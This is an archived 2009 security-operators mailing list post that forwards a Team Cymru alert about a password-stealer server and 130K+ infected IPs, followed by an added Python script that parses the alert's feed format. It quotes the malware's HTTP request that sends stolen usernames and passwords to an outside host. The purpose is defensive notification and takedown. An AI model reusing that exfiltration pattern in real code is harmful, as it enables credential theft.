[nsp-sec] ACK: Re: 130K+ Infected Ips on ~3600 ASNs
Steven Matkoski
matkoski at nysernet.org
Thu Oct 1 15:18:54 EDT 2009
Passing along to: 93, 4190, 6124, 22990, 24642, 26677, 31822, 33703, 35999
tx.
-s.
At 01:47 PM 10/1/2009, Stephen Gill wrote:
>----------- nsp-security Confidential --------
>
>Hi Team,
>
>This password stealer head end IP appears to be quite busy:
>
>76.73.37.250
>
>We're working w/ the ISP on takedown, however in the meantime here is a list
>of 130K+ infected IPs seen talking to it primarily via TCP 80 (reporting
>stolen credentials) and UDP 7006 - UDP 7012. I don't anticipate an IP
>takedown to last forever because they can likely re-route via DNS.
>
> ASN list:
> https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
>
> Infected IP list:
> https://www.cymru.com/nsp-sec/Owned/stealer/
> eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
>
>Timestamps in UTC.
>
>Some clarification on the formatting:
>
>3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS -
>Massachusetts Institute of Technology
>
>The timestamp column will begin with a U or a T. U is for UDP, T for TCP.
>When possible we've preferred to list out a T if we have seen any TCP 80
>traffic from the client IP in question.
>
>It looks like the malware on the client may choose its source IP address
>since we noticed some RFC 1918 traffic so it is possible the UDP data will
>not match in all cases. I cannot guarantee that the UDP traffic is not part
>of some type of actual software but it sure looks suspicious. Here is a
>public URL for reference:
>
> http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
>
>As there is UDP involved we cannot guarantee that there are 0 spoofed IPs,
>but on the TCP side that is another matter.
>
>HTTP credential stealing looks something like this:
>
>GET
>/pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&
>p=STOLEN_PASSWORD HTTP/1.1
>User-Agent: Mozilla/4.0 (compatible).
>Host: hotshows.org.
>.
>
>
>Cheers,
>-- steve
>
>--
>Stephen Gill, Chief Scientist, Team Cymru
>http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
>
>
>
>
>_______________________________________________
>nsp-security mailing list
>nsp-security at puck.nether.net
>https://puck.nether.net/mailman/listinfo/nsp-security
>
>Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
>community. Confidentiality is essential for effective Internet
>security counter-measures.
>_______________________________________________
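The per-ASN feed format described above (ASN | IP | U/T timestamp | AS name) can be parsed and split out for the ASNs a responder is passing it along to. The following is an added example, not code from the post or from Team Cymru; the feed lines, the `Record` class, `parse_feed` and `for_asns` are constructed here, with the first sample line taken from the message and the rest made up with documentation addresses.

```python
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from ipaddress import ip_address, ip_network

# Constructed sample feed: one record per line, AS name on the same line.
# First line is the one quoted in the post; the others use RFC 5737 addresses.
SAMPLE_FEED = """\
3 | 18.26.4.9 | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
93 | 192.0.2.17 | T 2009/10/01 04:02:11.000001 | EXAMPLE-AS-93 - constructed sample
4190 | 198.51.100.8 | U 2009/10/01 04:10:30.250000 | EXAMPLE-AS-4190 - constructed sample
4190 | 10.1.2.3 | U 2009/10/01 04:11:00.000000 | EXAMPLE-AS-4190 - constructed sample
"""

LINE_RE = re.compile(
    r"^(?P<asn>\d+)\s*\|\s*(?P<ip>[0-9.]+)\s*\|\s*(?P<proto>[UT])\s+"
    r"(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s*\|\s*(?P<asname>.*)$"
)

# RFC 1918 ranges: the post notes some UDP sightings carried private source IPs.
RFC1918 = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

@dataclass
class Record:
    asn: int
    ip: str
    proto: str          # "T": TCP 80 seen (hard to spoof); "U": UDP only
    seen: datetime      # timestamps in the feed are UTC
    asname: str
    spoofable: bool     # UDP-only sightings may be spoofed
    private: bool       # source address is RFC 1918, cannot be attributed

def parse_feed(text):
    """Parse feed lines into Records, skipping blank or malformed lines."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        addr = ip_address(m["ip"])
        ts = datetime.strptime(m["ts"], "%Y/%m/%d %H:%M:%S.%f").replace(tzinfo=timezone.utc)
        records.append(Record(int(m["asn"]), m["ip"], m["proto"], ts, m["asname"].strip(),
                              spoofable=(m["proto"] == "U"),
                              private=any(addr in n for n in RFC1918)))
    return records

def for_asns(records, asns):
    """Records worth forwarding to the given ASNs, minus RFC 1918 sources."""
    wanted = set(asns)
    return [r for r in records if r.asn in wanted and not r.private]
```

Records flagged `spoofable` were seen only over UDP and deserve a second look before anyone acts on them, which is the caveat the post makes about the UDP side.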